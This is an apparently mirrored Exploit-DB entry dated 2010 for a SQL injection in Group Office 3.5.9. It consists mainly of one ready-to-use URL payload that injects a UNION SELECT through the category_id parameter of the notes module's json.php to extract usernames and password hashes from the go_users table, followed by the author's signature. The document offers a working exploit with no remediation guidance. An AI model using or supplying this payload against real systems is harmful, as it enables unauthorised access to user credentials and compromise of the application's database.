Group Office 3.5.9 – SQL Injection - 体验盒子

作者： ViciOuS

日期： 2010-09-13

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14988/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

=====================================================================================

Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability

=====================================================================================

########################################################################################

Author : ViciOuS

Author Web Page :http://www.sabotaj.in

Email : vicious[at]sabotaj.in

Script Page : http://www.group-office.com

########################################################################################

Sql Injection :

http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--

########################################################################################

Thanks WwW.sabotaj.iN

########################################################################################